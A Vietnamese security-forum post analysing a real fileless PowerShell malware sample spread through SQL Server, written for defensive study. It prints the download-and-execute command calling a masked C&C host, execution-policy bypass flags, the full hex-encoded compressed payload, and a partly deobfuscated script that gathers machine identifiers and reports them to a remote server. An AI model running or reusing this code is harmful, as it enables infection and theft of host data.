Phân tích virus Fileless - Phần 1

Thảo luận trong 'Virus/Malware' bắt đầu bởi HustReMw, 12/12/20, 10:12 AM.

 1. HustReMw

  HustReMw Moderator Thành viên BQT

  Tham gia: 20/12/16, 05:12 PM
  Bài viết: 507
  Đã được thích: 236
  Điểm thành tích:
  43
  Fileless là một loại mã độc không có file, nó thực thi thông qua các script như Powershell, JS, VBS. Cũng giống như các loại mã độc khác, fileless phát tán thông qua các con đường như khai thác lỗ hổng phần mềm, lỗ hổng hệ điều hành, email...
  filelessmalware.jpg
  Trong bài viết này mình cùng với các bạn phân tích một mẫu fileless thực tế nhé :D
  Untitled Diagram.png

  Con đường phát tán
  Ban đầu mình rà soát máy tính thấy tiến trình của SQLServer chạy Powershell với commandline
  Mã:
  "C:\Windows\system32\cmd.exe" /c powershell iex(new-object net.webclient).downloadstring('http://d.a"xxx"g.com/if.bin?once')
  đây là commandline đặc trưng của fileless, đoạn lệnh có mục đích tải và thực thi code từ một C&C. Từ đó, nhận định virus có thể đã khai thác và phát tán qua SQLServer

  upload_2020-12-12_9-50-48.png

  Phân tích chi tiết

  Trước tiên, nhìn vào commandline trên tôi tìm hiểu thêm được các lệnh Powershell hỗ trợ tải và thực thi script từ một URL, từ thực tế thấy các lệnh này rất hay được fileless sử dụng
  Mã:
  iex - Invoke-Expression: Chạy lệnh trên local.
  Icm - Invoke-Command: Chạy lệnh trên local hoặc remote
  
  ep - Set-ExecutionPolic: Thay đổi policy, thường là tắt cảnh báo, tắt check sign
    bypass: Tất cả các script có thể run trong phiên tiến trình powershell đó
    Unrestricted: Tất cả các script có thể run trong phạm vi cấu hình (local, user…)
    Restricted: Chặn chạy các cript
    AllSigned: Script trssted sẽ được chạy
    RemoteSigned: Script được download phải trusted mới được chạy
  
  w -  WindowsStyle: Thuộc tính cửa sổ
    Hiden
  
  -enc EncodeCommand: Command mã hóa base64

  Tiếp đến, tôi thử paste C&C trên vào trình duyệt, một điều thú vị là đã tải về được một file if.bin, file này chứa scipt rất dài
  Mã:
  I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227ee156fabbbd7c3dff72917f6f6ff7fb9ffc6eabe6dbd5e2f47bf776beffc9c7ef3ebe936e7d94fe6ed4a43a6fd2cfd28fe9838f3e49b7bed7b4f5d98bcfbfffbdfaf4f3d3dffbfb8f1e2db2f6647efa7aeba33b1fffde1f7ff2fd7bbbdf9b15cf9fe7f3e677fbe4fbf4fb59599ed2efe956fa0bd39f49ef3cbcf7fdfa787ef2bdd1c73f7df0eae3d36956becc5f4db7d34f1f9acf577b3f283f4ef3e9f1f3d5e9abed4f4dfb3b3bdae293873bbbfadb83fbe6a37df389f96e2bb520d23d03fbcede81b6dbb130f6772db407facb7dfd65cb82d8dfd346a38f5f2d7eeac1fa630f7a7ae7e3df38f98d933be91d1a1190a71f23faff77ee35f4ef564e435ce5afc6f8f6a7160f77dfe2eb3b3b07df7f95cda7dffb64f7befe02ccf9b7ade09557b3fa8bdf4b217e777fd985c8d830442281007af8a9fe7260207e724f7bf340d33cf047dfff7c59bc6a1bd0d736dfa5e61f7ff271f0ea270ffb30f67b30761f18107b16d8aef9ed7e1f0261fe4b40bccfafabaf9ebe38c58f1fc3dffccf2f917f7ff17cda66d35ff263fcd79df3c5cb7b6fbfdf2ecfbef7c9ec275eff3e9f9d2f7e217e7e7207effe7ebf1ffe4d9745f5d3dbe9ecaa69b2559b5fd00b5bd2b8d0c693dfbfa967b36c553c2ab34955a28534984c57d2a25daeabe9b832ed6c832a6c50f41a146103928065beaadaba5afdfed3e2a22a6dc383e186cb3abbb6ed1ef4daedda864d31cb6bdbf2d3618861c3fbda30d2703573cdf6879bcd9bc636bbb7a1db856db537dc6ab270c0764db3ebbaf530aee5c3696601ca07b3626d274f3ec917d9f2f75f2daa69f8f18b2fcf5ebf3afdc99fa44f89e73ec1ff19f04ffe1ecbaaf9e9314dcc5d6e57d6ebdf7f7955cdc03317cba26e5fcfb2aaa44f9e8eefb4cbbc284f26f977c76dfe226da7f94f4fbedcbeca5f6cfd98f0e66f9ccc5b628545012453fcbedd36794bba9399565b9d7e71fce2d5e99baf5e7ef1e5c9a3cb658eb69fa53edadaf0e9d9575f51a7d3f5acaa5f2ef2b6b97e5de7ed9a1a9dfcfe7bf796c5770585aa585c6d13976f1114258702d84ddba62eceb7b5dd36fd28f326dd3d2d5fa74d938371a7d917e33bbf245fd72dd0f88953929abc9c643435c5f8f7a78f7e719ad7f9fc4ade5956459bd5eb8be27c599d102aab6c76fcb6aeae881a3e425f168bef12429f03219930c5e717d39cca6f9052a22e663faf5964dba69a6fe76d515f490bfee713cb05faa1aa05f3c3fe945fd2c833f885f9f26d96d793a106a691d141774026619c56f86a55d4f5daf2da67abe217b2947f96afaeb585c779d2e652584e06ff015c0772de843868fbbbfeae27275fbdee50995b6c78f117df314cf18b7232a01759790ee4ce8ba1f75839a3133252f43ffc36d23ff143557e3de63618b4df087f07ad483de4b36a6a55666ae99c4ef377397f4cec65f0fa2121b5f38d21f58befdcd9028b90dc8eef6cfd9e4c64f749d0cb00cdcdec5a1cc6e3f1db693e9f9263525cd624e7824f5b676dd31331239177ee7c9ab617dba4ac2e967939b6c0b6d2d9322394dc089b6591b5cb6ada56cbedd4d7deb3b2c20b5be97961c1a67762768fecb223d9d67c4a92579deb2bfa23fa5a93abb6da4e1feeddbfaffa9b10a756dbe9329b36653665d277903240efec6eb3d561e985a9de1a8ff1e37b16321b70bfa3dd9d9d079b3a30c8691720304d00c9ee12cdb91dbfbe6116bab3d9fdbbafe0ecbcb1d2fa31fbe7fba827f816463bfd2c6927721dad8272480eaa22d76450e9d8162c19ea1e75c40f9f7ad217f43b2c24fcd6ff0b64c48ce9fd44c4bcd591909f5dd13838d839d8d48122e5913f2e1983a4ffb9118cdd6656ff2c0bc6372115bb4352615cfc8e58f0c7343de63dbfe7885c104b2fc80b4de5b59f3bc1e8c738b7138dc87b3f54e178f8e0dea7bb911efa78790cd0938f3d16908d73e00dfb67471e7e240eff2f1287af290d3708c30f43183675701b51d8fda644417eeb4ac50d6231a3f0165924fb39fe1892184a8afc7025e63622a3bcb91b9516272e92d049bdf192179702625b5512a23bfea52c443da137ba72c4e076b7a31f7344e5a03fc2cff4ba7eb341ced1a42c33e576ef658fdfe3c24bb45cd5eb490a1cdf5f6869e4ef29b71a92dc2cbe4ae6f7135e7de99bb7631b44776f6f93e00a461ef1e31ede06f27f73325be7d4edc44ad944b38c5d49fefe92759565a99bc5b959fc1c4833f14b4c46bfbfbb3d1eef6d7fef0e0beb6c31e5cc6aba4bbf6da7e167fc5177b4297eddf6447855d0d4aeebf21735cd02893a4bc5514f72eff448c7d31948f0564c8273621c80faac07f217dff9e413004d0f251bec21da9684187fb5f3197e6edd46ce79185f43d2df53cc6f966f9982f7136f79e7872addf7eeedc3491d36cc5ed67658bc43aaab0e7c1f39b72b3bfe37faab1ff4759f1b1b9846372677cd1368945b38c770257f7f0c94d62e7e585ae2c641a47eceb72dd2b6baf8fe27dfdb105c0f3d80a2d3499e8364e037a47efdd7c499b8e0159d8eebcdf4ba00c114e46de0fde23b3b2cb5dbdbbc14a06b455b7959cc6fcc61dffbcc7fe7a6d6ef33fd3fe499ff3127172a8d58a421955dae2f5343d5b459e494d0b2c8f6a7de03f38bef600a3a46c64d17def9fcc917afb7f3b7d5e5f2ec33b308e363d1d1c3a21c2c3283ba58ba378352f5700b7de0216f7ee73f526177e5f7f460923b12c4c76f15771392408d16e7de3bec0ba89fa5d23e0442362e4f7de43af83cb8053e03e830b4348d22f4a08f90ed3c640f6af83e8c91a6bff80ebde623828f9d75dca2797efde8d1f7a7cd83ddc5b861bf61fa9a7a6c9bec84f8e0e5f73e93f7ddcb83dc42b8bd1f9fa852d2bf6f6414219d583f718bd6eb97308c94f95dd3420b3ec7aff097d8c721c3bfa866fa8dfc91cfdb88df74bdaaa6da91cad3279f306cf1684ec67e177069f4cb1d9a35fed5ba35e67d688831fe49f365149f603ed881721ed4c938c09c7d2875a260d67b7e94522e4a22ee18d8ab432604e2489066885d059eafdb9187794a60eae479a0e3619fef1a9e8cfde6ce35c4a8ba83eab299e3331adf66e75095d0cf968f18b8886a8d6eeb2352301abcf743f513efefef6f822f2879e48ffb891bec810c17ff5a7fc3e2f819236922841047b0027fbbf3198f8489e780fd12f951fdfe8d7de5b31082f64d2cefd6193f535d6bfeee3808685bd9fc9b36eea4b0b88dc6ebda228895f9fbd5cc87207f05efabfb64005cf864e6162ab006e1ee882af6ccbd162638d436959893cf3cdb6258d51a34fc557ce3f4330b56dad4fc1969790b42df40e71bc87c23956f20f20d341e26f19d1dcec581c559a77b0cab996d0e987fff3a6f975e9f3235da7cf733b4d364816da93264a1d2f79f7026e4708f25867fdde1575962d0260090ea7c931de12fef6cfd9e415868e620f29d923ff28d523e066f31f0852a161e2ac77034921d7a443bdfc91745fbfbb346a156db77a0569adf5d944bb6a8ab675f514ea4cd9e6eb7f9e75b5ba0061383fb510a4b00814f36bdfc59d0115adfbfbff79955503c637e8ec3d211df10ea32b3a6977993cd578b1c6f72779f7d92e223316e8637bc46a18d714dd9b4a0b56643d32f9ebf79b1bd2474bd97155c9842eda44f7f63c152bd6e87ac32a389d781ec6c36f3d0f69d0dcbd53c0da75f1cbf7875fae6ab975f7c79f2e872999b97e0d3080c634ad95aafabfae22de57537b4b95396ebe5d64083dd6d16256e481f7fe71e9b98adf32fdfe5b3e5d9386c2c7f85540d1c2cb5d918ce2183e45e4770ca1e71c3a7dfc2ef5bf9342b57f9abf19dad050571e37c5d6697dad767f2c31245ba44f65a50b1867e80cef3f97c803d0c7f70838dac7113d406edbb931783eb35b434a4f1ef4c1f1eec4c77f20726ebfdf0fef4de83c9eebd8779f6e9ee6c273f9f7e3adbbd677d5901ed53d7e1f4085da4d4073e1aa23df87b03e505d267f2c38e48fc5fa2bc767f13e5572bc892a591951b47a21d51a2c637e4f6d631e4bf3ae4b33036f0b3821998b810a919af7f7467ee7dd1f2a0bc1f62bd79d11599971be646a07c263f2cce82153c60e9e4a6b95973c864c8e02202470469110ed4b5bba5ba10201b68a20d06262bc4d20b0037a3e935fcd9c3b33777f9225b52c75f857347c146307d02e833f96187b130496eed2798be43d6119f8c1f2d553d88e2fceefe129f8f1c076f35390ccf827209eff28bbcfede67aa3a03282cfbb77999e5bdf3b265d0db005016058034b5202c9d6e03820923200c208feefc2f4fa4151500bbfe42b36c5886f1051c007ae2809f96e39ab9d2d8e3bbc066e884350336c3b7197de8cb41a153b0dc6058e6fc00789f195a751405b6c0122fd71529a49f78adc3f87d7676eeb3d94063d76acbb23145b1f7ecbb442d4fe37f7fc7fb62e9f12bcfc023a67b5b94ab669c2f8bd235d5df2ca6d7595d67e66be271af75c8e8690adb4810fc37aca4a3bfba6ab3ba6d8a65b1981d3321bf9f97d5abe5595b16eb270d658297c577c765a6a35f15534a0abf1c5f536cbc9ee6afbfb725ad9bb3f19d3b5b9420a66cc10979a5c46fd484fe9e9d3918bd97bf6f3fdbd0485484ccbcc76cc4f42f14a9317ba231ad9b225578074da5cd0dba97a4a86dc55f65a9d94e9f9ebde637d943b75c77873ef925fbbf7846f2c60aed33f7a21297cc9a3ac8343d0c203513c3f3cdfef9f41852fbfbefdda39143aaca936dcdaa178bef72604033e7fbcae80b49a396a68be7cacb53c870918c5499c43ff7d2559e97cd368707dcc4ac51cc0c4cbba430a701148b02ea81d5806bf759fd0bbda5035a3568b3d9184defa25db0644021cbb3810583310da4b97e2d23ac68dd6029eb06dec000138e565ab5b468dbf2103b43d4504be35387a38da0eeecefdefb74f7fe9eb87522ccfed85242e34c880bc10ebea2df5f6eb74dfe66eb7775c1576a9668d00d3e80f41b0aa8c6fd64b568359480b83a903a174a63a3679745f5d3dbdfbf3f1eef7ceffe6c71cea90b8fc26612edd49c9f715a8bbefafe39e970b68ef2d9f39c3028b309e53b59f39bd0f15ddeaebf409e6b46e49abff1166b0ef34656ba3f73504d8712e11a97fa11c3bdd05168f46b6291d897d66beb7c49165b00ab17117e8d3c291338fcd8d0eab38949f0c4bab4d933f7e5f7bfff3d5eb86abee79ad924d150336ab8ffe9a4cd26209eac7bed7f4a947ab2a8ea67a4ccda3abf5c5627df2358d4e8f7cfdbeb89e261ba509bd6411223c8dad5a29ae23796ab77559dbfb37fdddbdb9dd53b44b8dff3a5fd0ca949fb47b5c867f68fbc2eb2e242b394fcc9ee8e7120ec47c4c0adfd0324b77f3c7ffed50bbfe7a02563d201f5eacba7c7af4e5f7e693ff8f4fe3eb53bb67fe3affcea17d9bf0f0e0e604932d760ffdebdbdbddd5dd76267678fd252f66fed937864e57f4c70a793ece4c9b17bf181749eb9def5dd55e6debb38cf67f4a2fddbff1d5d7b4def7b9850f7daabd7206b823fecafedfd7a3fbf77b5f78bdca8b215251ecb7c414b92e623c5d6754fba906cb063846ffdc2dfef77273ef9f1dff377b51f111058bf957b6759cc9be5daf5bdac2eb27ae6fa7d68c8623fb29fb89e3b93d4c39e54e6eecede7d07b503b2072f9cd25df3d84f0ef4b11fecf4f1a4dfe57ff693d4fe9675f9eab8fb81efb77824be94851f01c28ffd138c62ff584e2ea7ef7ee0debbfa453e22ebeafaed747d6eff7ed75cedfd20f308b6a42c5cbef2a6655515eb6b52121e86a40c26a44126f683cef77d69339f3834a963ead7fe599565ee188c7c8e265bd83f458df863448edbf59ebf5d56ae350d11c42abcd7ab2b4f07019af7e7d3573bdf7dfd3af8e0cbf0839e16d30f1c3e32baa04515b6a039f83d7d81c5a4ff9e8138e393e003d113de987d76d8ddbbb77fffd307070fed277d36ec7dd0fdfb3e3f0e669fcfed9f7bfcd83f77f871dfeee23ffbe7a7fc74700dbaf1456cef5e4776486305580638077fd0bbfe8bdee71e6aee53fb1b69b369995fd9bfc1d06d5539b120cdd5111ce54137c50ff9f1bbff3d6da4e1e6cffdd90b474ca3f0839f3afe89df3510486ae141f9bd5f7ff7f70cbe263409591f538a4ccaeac2fe493cf47b7608fc7b16f955b6feb6fd88291c4870cf1e99e1390e24128e7db82236c75d19f0a496fc88453359cfec07e35e37e7b3c6f5d0aeabf934ffc1f4f7778399930d71ba2db4f21de6666cc5b4898b26f9c021374973053de5cbefbe3a7dfdd5b4587c77838f65bbb408c441696806483148bf44dc2ef1d3aa3763f98528f76d38e0cb9a9ccc575ec42891eedeefcde0ed4be4c33d81b737a3159dd57108e3fbb3a2fac9ef692c27301ab4b75d9ca5e6758deb9e71ab9ab88ac26681356edfe56f82a8871d701a5ed097260d14d59d74b49853b4535d94c7df7e890e08667159d52fedc779539527edeaba3e7902cf947f81634abe75d6be7ef3e2a58d420524f99b3f450d2930689767df4b4f5f6ca79d2ed2f3339f5c404cbec06fd715913d7ffa611d3a90a62f192b0768cfc7017147e15f213673b0cab31b90e940c77bd59b8c16cc2cc0ce9f021f1fe1af5b4037b4525ef31313660a49417ff02c2a55df671e7d54bc256b7ebedeccde844438b7369ef760a4afbf7a73fc867ea7d0b8b84a67145b67e7fc1ead62e6b592012f514c5ed7a71cef7f57c6a03cb5c35d79302d2381def4bf0e62b18f2ca22985d1afbed793b42e421b39e0c6f9ffc6269f18e97de7ff56f4ef61458af0cb0f9e0acaf273979ca4d87ffa05e74a3b0411faf7c9e210d848fa0e213e13e6b6b36bbe88b70d3109da7eba9b7eff7bd03da1b64e535f217d5f9ac81b77eed4bcecbec52d5a9aa9fcf3713eaba6c5f22bea15f9976aba3c654bf0bd2d8c9c13054efd3094df1334723ca57cb4a3cf3b24485ebf3e3d39f9eaf5ef2f13f9639af80c449356f5d7e9234bac74b15ee6e9b42827eb55c09f3b7b1edccf8f9f3ffbfd4f9f3f397efdd5e9abdfffdbaf8fbffdfbbf79f9fbbc3a79a2ec373af0b1e0d627c75f7c9b5e79fa82da7efefcb8d37ed76fffed9337c72f5f9f3dfdfd7ff2cb572fc386be5afac560f1600c1759f9ac597d49b394f686f17dfe568d331652f8efab59ba778f6692f2d7984ec5a65daf966793694a70239faf64ba27e9f739a37efcf2f9385f5dbf99e517190578cbafb69ae39292e675f6454a6f7c69df663b940ae7a4dfa76fd29183ddb3526e4690257e87c1d0df4d3826f650ca7236c63b538e19b7daba5a2dcecaf2e90f7bacdecb9b871a1acc6f74a037d338b05edf68df9b889cd7b42641541efe6e65b12eb36555b4ab00f591a8160cc08372534b07b3c787f62b0a04c2af55d3a9ae288f3793d3377cb7a366d5ae8f29b1ff9a925a27c88bea6f1a2b7e0895ad8e9ea7f500ca9b4ceaedd0df882614d26d30c5b4d18a52bec84b7af307cd4a7cfb66604a676784a9df2a3ae8c129dd64316f37e80f9833b1fea6335a44981ad84ca5269f169775fe7a451697701fe70b5afe5bbf32f10f0db8594b4b1843a26fe49bde27308cbf670a42923e3dcf9f42656da7fcef6c762c6819138c55f8ed65fe39379f2ed7e7f89623c5bc2933ac78486458c3e4f077e6175d34f1be36df9033b3dca659d83d2d5fdfd96ddfae7e7f8a16b937faf97abcfb765ae12fff15a0635bc12d98d08ac7f8ecece4f571cf23a019f081fa603852fecebd06ff3fd83e6fd79fa91cb779832c727a38839f41ab5bf57a7b41eb8adb575757dbefee3243d2bcac56d923a6133127ad789e00ceb7ee7e2b7dd4ae725a78c49fbbe3fbf7c70fee1280297dbccc2f8eb7b11ec95fedec3c78f44b56c52f06568f6809eedbf2c2eedd976fde7c3b3dbcb3b7f7bb1fdea165bcdf7f9abfc3aad7167e8eef6ce9ac63c886012e965939ce2eb39fa677b6083dca71bf461ef335c565e3bd32bf5c8c29e99dd7f99c722565d554f4423ba6c4c96779395b66f35fb84b36ea2525a3befd59994fb2e7f4d7eaf7ff8598b3cf26abf3e5efff7b941958754c0bd10d2ded3edbbbbff7bb9fda7fee36d47e51dcd56fefa66f4e3f67ef96920c6ea27ccaff12ff0f34fd250ff67ef7d9624acde89711fd7fbaadbfcc9bbbcb6272977efbc59a9f789dd2baa6c2f7c863401ab0bf9858324f6fd1d35dfd853efd1abdb08ea357c1be20392dc05d559c6a32ebdbd21b2d9efaefc9b2ed78977fe27bf0698cd5c126a315962fb7e49dd5f4cdb869736afbda5ff27d333d25f6214ce9dfedefd23fa72f98f52dfc1ed27776c6b4b0b96bffd9dfc518f6eddf7bfc0f7f782ff621bfee7de33efcd47eb3b3bbf5e8cbe7a7dff6e9a1ba44e8a181977ce6adb51b5403edb0c50668ec918949f4fd3bbbdb97d3bc0654acf74e96f84dd4ffb062f84cfb3450e4adfcb2c8a7f92bdbc767a9426645788796b3d2d11da8cc9cd7a4799dfa7a821f5b5b2462640d966762e6a943f602a181187674483d7dd71d9cafa41eee3e7ace5ae2fefdbd47af55c1ec8df776d37b9c7dbc852eeca842614566459f133b48382dded7f296a7641ddde2fd617c1b675b5ac2b6bfdf11b1d22e209d53acc5dc68997e2c1cd0a05922bf7b46ecb8c2b71cea93b6bf8be5a07539bdbb7b79b7b9bacb4ccdfd837157a4e459e2985d7c50ac767ec92fc10f5516d4c0fcf5c87e4c3182ae61e3ffbfd87ed10c7e33cd570dd9936541ee5135dd5e64e68b91f9e5c5abe3dfa7d713d9ac76db3362bdb7f245b6a4b5ac1896f86ae3bbb362e0cd59117bef17e39fcf7c627b8463414303d224f87564fe6679cba759b9caebb1d09348afbff800ee7cfabbdf595444c057db6dfef9d6279f6e116badab134aebd84f590e69b1753c7ef0f0939d87e3f1fd4f3f79707f3c3ed8dfa244041c81ef6d2d8beaa7b73f7374f13bf9febdef59443913d3d2089bed541861eb334311ff9d5f4c2a2bcd97dba97bb3471e1ee4f997eff2d9b2182b30519a86a9f07f664eef4d4aa82cefde965905ea8fb148b060a84e5451119dd7d7ba96bc1fa47915fc4d7ad728de0fd0bc02a3ab775f7654aef6645c96df5f3fbe9d5205ce366de5748c3f5b50d73c0b9f7d62fd22d389696bf92385f7d2030139a1d6c61e70eebdfcfdf5d347928af7bdd165d5fcb4efaea681bf7a6b64ee586603cb6a77e045f5972303fdd6adfde083839d830d7ef0bccd98b86f5e7ff952101ec417fd0b49c68a235281018d52f6386c6bf5c2064c9f69d59b06c6233419e66bcf0c9a8fee6084dfa029b45da939b47fdfd1418e9466a64f1577631935a4f3eca7d8cf659d5ddfd27cf2bfa1ed14a66713b1ac9e32859c37e7bec4dce697b21a6a693d23a9256d8c39754a2978a599c0c4d5d3bbfc4f5955abe66e9d5dde4deb62462f34e94571be1413790ba8f7d2559e97cd765b93d6f860dc0c472cc94a99ffab29fa96feb77bf75bfeb79687deedbd03f6efd9615b55750a5b446b0ce793af317e03e81b21269abd5b2f8b32a5ef79713bad96f4fbba7a16e5825f7c67276d2fb665951b2f3e7fd454f87debbcead8ba00d9ea7c59dc8cd266a9f6b9b7c3d7829b48af1882870fee7dfa0d88ad422661f57adfc5ca65c4d67e4d83bafbf52ceaae5ad49f7d8b8a6fbea61d35c9a791b1c7febcdfa4d39a62463ada576aaad69a554179bd0aad7dcd66e6c77dedf1af4d58c2859c8e5d9b4fc0978ff8d3141fa5489690b3952eb3699352eea4e2f04cfd82d0adfafe2e63fbbdc66318d34e58459c36b2d3aec31fd3efeeb8b7a7f992649699957f3d991161a3c08556e479e6da32d28c961b0bd7b2b9ce7fafb1fb32a5d50f79636b3ea5c9a8ce7db5fa9ad5eaeb60b0662cdfdff91eaf780674fdaec589a5af337c5f8abf3f341a377abf95fdd0920b0c8b29373f314f8e61941ccbe2227f12688f3ea48d0a2158d9ec531e9ac09136a75c5d3d9b654ad708598916bff8f72448c180fc8f434d433cb1ad0caaee99d7c5f7fcfe986dd3aa4df1f3139a9bfe978baa3e1f8fc74a27e16b3035ebeb41d5aedd7bd08c32bfb3c5285b46febe66db1a5deb15e1f35eec3418dddfdf0751ebea25bea47538f97c6b91d5d94bfe35fdc58c61994d3bd900957ca0febbfeaee4a4cc52ed866c87e42bbdf1080bf2bfbfbfa1c698e9746fb26e78967ef1efcef9b2fb7ba4a8219ed5efdf00daaa78546693aabcb033f263baa85ffdfee655ccb48563671b8d5c9b1f97978496eee32d4fd7f06729c579eb6a03fec6a80562c5affefecb8c73158cbce9c0f2e99da04da35986b6a210c043c7ea09fce59169f2fb875da4fe9f812848679f7cc28439fcf4fe5eda96dba9fcb5f3197762a8d3071aa1b937f4b744d8c92fbec3ae064514c08c9478889c0a0974decbb3c9fa6553f09898f87728d1468bfc8be25df6859f32d8fa6467cb1beb9d3bfb43ed76a51d4f0fd00da9204357477a8bdcb9b93f73777e494abca7f8756660553083830abfd8281ce4f7bf9b8229d3a24f1796bcc8e73ff663bfb1f0458cd9f786983d0ac870bb60ef33bb8513aa36c7eb3eb36f64757502bbaaa7c3debfc470b145e293f4cecbb3365f4ed6af0d317c8e97a94865cdc0fced096ce4f55064742e5f9ea1b5cf48f24dfa8bfdf731973aaf6e4aedb09dedfdfedef75664540405c2c14e0cfdfefddd0ddfed78df7d967a3d1b4b685b6f215bf57a6c9adad73c42e2674e8e3a307523e55c0c85f57be6ffec38d2a2e955c371d5584851579ae4da19f37f37b41a83c51e7eba7b53b3077bf1264e1f19362449296149c086d22460411d6654497a42462c6f001912c83251f546acc8f1cb3343c44f3ce9b4f432846f9be279cce4a782d533d38e592c80c36c84c781381e1b97865605b317d74f903e21bd43cef5eb174f3d9f84bdeba0678317547084045[...]c7efab4a400f08b9dfc0a63fd092201c5f557b3273f787a51d167ab675fbd5a9c1eefffde6fdf1d7ff55571fad54f16bf17a98d67e59bcf77e6d32f4fd96f7d4373fe966c392d729efd3e2c61eb8bfc277f2f5a1f77214431d9fdcebd302c209bb7daa1d0e0ece48bf5e94f2bfbcca6effc68c49add9f9c7ee7075f986863fae29e468cdffebd3ffd62efcb9223c2dffb3bc5f1898261eb7a71f1ed192dedfd5e1757df3ebfb8faee6c7dff6960572edea2f76fcf7e0050145c193017079f6764fd286e2d5ec14b58eefcdebf179bae9ffcee647e7f31259b32bb82693316f82bfdfcc5ef3d334123d607ef1edf9bfea2fbc507078864166f1f232a017e142a7ee3a1e28f62c4ff17c5883fa41851a5e987182a6a8f3f8a18df3f62dcbb6dc4c8012311792bddba433fe87fcbe2cbef6c7f7f6fb4bb3bbaf7bdd32fb2e5185f7cebd56cf12dfa999e969495a88f2fb7b6d25ff831fdf3513a4a3f1e7f3cfab83efb7cdebea948433fa7ff9f9ed33f6f3e4eefa43ff3bba7bff877fbfdd35f72e7938f7eb7adb4b94c3fae9ebdfe38a5ffee7c445fffc6c9ff03'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
  Nhìn thoáng qua đoạn script trên là thực thi một đoạn code (lệnh I`EX) đã được mã hóa, để có thể giải mã được code, tôi đã sử dụng một trick nhỏ ở đây, tôi đã bỏ lệnh I`EX ở đầu script đi và thêm vào câu lệnh để xuất đoạn code từ memory xuống file
  Mã:
  [Text.Encoding]::ASCII)).ReadToEnd() | Out-File -FilePath "C:\dump.ps1";
  Và đây là code tôi thu được
  Mã:
  &( $PShOme[21]+$psHomE[30]+'x') (" $( $ofs = '') "+ ([strING][rEGEX]::matChES(")'X'+]31[diLLehs$+]1[dIllEhs$ ( & | )93]rAhC[,'j8R'EcalPeRc- 69]rAhC[,'p2zl' ecALpER-63]rAhC[,)09]rAhC[+901]rAhC[+75]rAhC[+94]rAhC[+701]rAhC[( ecALpER- 29]rAhC[,)28]rAhC[+001]rAhC[+411]rAhC[+77]rAhC[+57]rAhC[( ecALpER-421]rAhC[,'RmZ7u' ecALpER- )'
  
  ) )j8Rp2zlj8R,j8RJ3sj8R(ecalpeR.)j8RZm91kj8R,)08]Rahc[+15]Rahc[+701]Rahc[((ecalpeR.)j8RRdrMKj8R,j8RW4nj8R(ecalpeR.)j8RRmZ7uj8R,)94]Rahc[+96]Rahc[+801]Rahc[+38]Rahc[((ecalpeR.)93]Rahc[]GniRts[,)001]Rahc[+18]R'+'ahc[+38]Rahc[+98]Rahc[((ecalpeR.)43]Rahc[]GniRts[,)17]Rahc[+121]Rahc[+111]Rahc[+58]Rahc[((ecalpeR.)j8R}
  
  GyoUDNEGyoU
  
   
  
  }
  
  }{hctac}
  
  )fmP3k]tnI[+dQSY=fm&dQSY+)GyoU^^GyoU nioj- dwssaptegP3k(+dQSY=im&dQSY+b_srddapi:labolgP3k+dQSY=bcp&dQSY+tnuoc.o_srddapiP3k+dQSY=ocp&dQSY+tnuoc.i_srddapiP3k+dQSY=icp&dQSY+tnuoc.]1[nepotrop_cigolP3k+dQSY=8cp&dQSY+tnuoc.]1[nepotrop_nrayP3k+dQSY=7cp&dQSY+tnuoc.]1[1nepotrop_siderP3k+dQSY=6cp&dQSY+tnuoc.]1[nepotrop_siderP3k+dQSY=5cp&dQSY+tnuoc.]1[nepotrop_pdrP3k+dQSY=4cp&dQSY+tnuoc.]1[nepotrop_hssP3k+dQSY=3cp&dQSY+tnuoc.]1[nepotrop_smP3k+dQSY=2cp&dQSY+tnuoc.]1[nepotrop_bmsP3k+dQSY=1cp&dQSY+yrterP3k+dQSY=r&dQSY+camP3k+dQSY&dQSY+diugP3k+dQSY&dQSY+eman_pmocP3k+dQSY&dQSY+NOISREVVP3kj8R+j8R+dQSY=V?nosj.gol/dQSY+lru_nwodP3k(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(
  
  
  htapimimP3k htap-tset = fmP3k
  
  EMANRETUPMOC:vneP3k = eman_pmocP3k
  
  DIUU.)tcudorPmetsySretupmoC_23niW tcejboimw-teg( = diugP3k
  
  1 tsrif- tcejbo-tceles 1ElS sserddacaM.)}eurtP3k QE- delbanepi._P3k{ erehw 1ElS noitarugifnoCretpadAkrowteN_23niW tcejbOimW-teG( = camP3k
  
  {yrt
  
  GyoUgnitroperGyoU tsoh-etirw
  
   
  
  ++yrterP3k
  
   
  
  }
  
  }
  
  } 
  
  }   
  
  }     
  
  kaerb       
  
  }{hctac})tP3k+dQSY=t&dQSY+pirrucP3k+dQSY=pi&cigol=epyt&dQSY+NOISREVVP3k+dQSY=v?nosj.troper/dQSY+lru_nwodP3k(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN({yrt      
  Nhìn vào đoạn code trên, tôi thấy nó vẫn đang bị mã hóa, có thể thấy con virus này che dấu rất tinh vi, rất khó có thể phân tích. Tới đây tôi đang bế tắc, chưa hiểu được thuật toán và chưa tìm được cách để có được code sạch đẹp của virus. Tôi sẽ tiếp tục nghiên cứu và viết tiếp ở bài viết sau nhé các bạn :D, bạn nào hứng thú có thể liên hệ với mình để cùng phân tích nhé :D

  Note: Công cụ phân tích virus Fileless
   
  Chỉnh sửa cuối: 12/12/20, 11:12 AM
  Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
  Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan